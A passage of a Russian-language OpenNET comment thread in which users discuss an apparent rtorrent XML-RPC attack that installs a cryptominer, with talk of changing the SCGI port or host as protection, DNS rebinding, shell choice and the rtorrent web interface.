    Не помню такого, чтобы выносили. Черви, после заражения, которые в системе дыру патчили, были. А чтобы выносили друг друга не помню.
     
  • 3.91, Аноним (-), 10:32, 04/03/2018 [^] [^^] [^^^] [ответить]  
  • +/
    > Вирусы друг друга в винде, помнится, тоже выносили

    Да и на всяких роутерах вирусы друг друга зачастую выпихивают, чтобы конкурент малину не портил. Кто логины закрывает, кто вулны патчит. Чтобы ресурс не накрылся и другим не достался.

    Чем больше вирья тусит на ресурсе - тем быстрее он задолбает окружающих и его починят или отключат. Поэтому у хакерья конкуренция за халяву.

     

  • 1.26, Аноним (-), 14:39, 02/03/2018 [ответить] [﹢﹢﹢] [ · · · ]  
  • +/
    А если использовать в network.scgi.open_port произвольный порт, вместо обычного 5000, поможет защититься?
     
     
  • 2.51, Crazy Alex (ok), 22:19, 02/03/2018 [^] [^^] [^^^] [ответить]  
  • +/
    Почти наверняка
     
  • 2.82, Аноним (-), 20:35, 03/03/2018 [^] [^^] [^^^] [ответить]  
  • +/
    хотя нет, запрос идет не напрямую к rtorrent, поэтому  нужно поменять на хост, отличный от localhost  и/или путь /RPC2
     

  • 1.30, iZEN (ok), 15:10, 02/03/2018 [ответить] [﹢﹢﹢] [ · · · ]  
  • –5 +/
    А если просто не устанавливать и не использовать bash?
     
     
  • 2.32, Аноним (-), 15:44, 02/03/2018 [^] [^^] [^^^] [ответить]  
  • +3 +/
    Автор заменит в скрипте bash на sh. Удачи в его выкидывании.
     
     
  • 3.47, iZEN (ok), 21:48, 02/03/2018 [^] [^^] [^^^] [ответить]  
  • –5 +/
    Думаете, автор догадается, что башизмы не везде работают?
     
     
  • 4.55, Аноним (-), 23:25, 02/03/2018 [^] [^^] [^^^] [ответить]  
  • +1 +/
    Там башизмов почти что нет, а что есть — не критично. Майнера всяко запустит.
     
  • 2.59, Led (ok), 00:55, 03/03/2018 [^] [^^] [^^^] [ответить]  
  • +2 +/
    > А если просто не устанавливать и не использовать bash?

    Тебя маководы за это того... своим сделают.

     
  • 2.94, Аноним (-), 10:38, 04/03/2018 [^] [^^] [^^^] [ответить]  
  • +1 +/
    > А если просто не устанавливать и не использовать bash?

    По-моему со сменой порта или авторизацией идея умнее разика так в три.

     
     
  • 3.98, Аноним (-), 11:51, 04/03/2018 [^] [^^] [^^^] [ответить]  
  • +/
    >> А если просто не устанавливать и не использовать bash?
    > По-моему со сменой порта или авторизацией идея умнее разика так в три.

    Со сменой порта — точно иакая же глупая.

     
     
  • 4.114, Аноним (-), 09:39, 07/03/2018 [^] [^^] [^^^] [ответить]  
  • +/
    > Со сменой порта — точно иакая же глупая.

    Это в теории. А на практике делать портскан через DNS rebinding очень напряжно и с чем-то таким можно познакомиться разве что если кто-то очень принципиально задастся целью сломать именно вот этот вот компьютер, а не что-нибудь еще.

     
  • 2.101, Michael Shigorin (ok), 16:54, 04/03/2018 [^] [^^] [^^^] [ответить]  
  • –1 +/
    > А если просто не устанавливать и не использовать bash?

    Предпочитаете tcsh.exe?

     
     
  • 3.102, Аноним (-), 20:41, 04/03/2018 [^] [^^] [^^^] [ответить]  
  • +/
    >> А если просто не устанавливать и не использовать bash?
    > Предпочитаете tcsh.exe?

    sh
    причем именно отдельный, а не алиас на *ash

    Хотя, в контексте новости - все "те же яйца, только в профиль".

     
  • 3.106, ыы (?), 21:38, 05/03/2018 [^] [^^] [^^^] [ответить]  
  • +/
    cmd
     

  • 1.34, Ващенаглухо (ok), 15:51, 02/03/2018 [ответить] [﹢﹢﹢] [ · · · ]  
  • –1 +/
    Что за хрень?, rtorrent запущен, но не открывает он портов на 127.1
     
     
  • 2.36, Аноним (-), 16:08, 02/03/2018 [^] [^^] [^^^] [ответить]  
  • +/
    он открывает на том что написано в scgi.open_port, если там localhost, а в /etc/hosts последний Localhost ::1, будет только на нем
     

  • 1.40, Аноним (-), 18:56, 02/03/2018 [ответить] [﹢﹢﹢] [ · · · ]  
  • –2 +/
    рторрент настолько гибкий и настраиваемый, что там веб морда накол не нужна.
     
     
  • 2.44, YetAnotherOnanym (ok), 19:26, 02/03/2018 [^] [^^] [^^^] [ответить]  
  • +/
    > рторрент настолько гибкий и настраиваемый, что там веб морда накол не нужна.

    Щас прибежит юное модное дарование и объяснит тебе, что CLI - это настолько позапрошлый век, что его даже упоминать неприлично, а жизнь дана человеку не для того, чтобы тратить её на набирание команд на клавиатуре или правку конфигов.

     
     
  • 3.45, Аноним (-), 19:37, 02/03/2018 [^] [^^] [^^^] [ответить]  
  • +1 +/
    И правда, зачем учиться говорить, если можно обходиться жестами?
     
  • 3.46, VimCoder (?), 19:41, 02/03/2018 [^] [^^] [^^^] [ответить]  
  • –2 +/
    Программист не человек?
     
  • 2.52, Crazy Alex (ok), 22:22, 02/03/2018 [^] [^^] [^^^] [ответить]  
  • +1 +/
    Была бы не нужна, если б умел сортировку закачек. Нет, не 1...6, а по размеру, например. Или банально посмотреть, что сейчас отдаётся. Но его UI уж слишком минимален, да ещё имеет свойство адски лагать, если не выходит достучаться до UDP-трекера
     
  • 2.93, Аноним (-), 10:36, 04/03/2018 [^] [^^] [^^^] [ответить]  
  • +/
    > рторрент настолько гибкий и настраиваемый, что там веб морда накол не нужна.

    А еще она дико тормозит и в ней решительно невозможно понять что вообще клиент делает. Поэтому смысл в таком интерфейсе лично для меня остался большой загадкой. Пользоваться им - мучительно и нерезультативно. Для батч обработки он тоже не годится, слишком интерактивный. Получилось нечто, ни два ни полтора.

     

  • 1.69, Аноним (-), 11:31, 03/03/2018 [ответить] [﹢﹢﹢] [ · · · ]  
  • +/
    Если реализация такая кривая, можно ли украсть намайненое? Хотя бы часть?
     
     
  • 2.92, Аноним (-), 10:34, 04/03/2018 [^] [^^] [^^^] [ответить]  
  • +/
    > Если реализация такая кривая, можно ли украсть намайненое? Хотя бы часть?

    Замени кошель на свой и перезапусти? И пусть себе майнит дальше :)

     

     Добавить комментарий
    Имя:
    E-Mail:
    Текст:



    Партнёры:
    PostgresPro
    Inferno Solutions
    Hosting by Hoster.ru
    Хостинг:

    Закладки на сайте
    Проследить за страницей
    Created 1996-2024 by Maxim Chirkov
    Добавить, Поддержать, Вебмастеру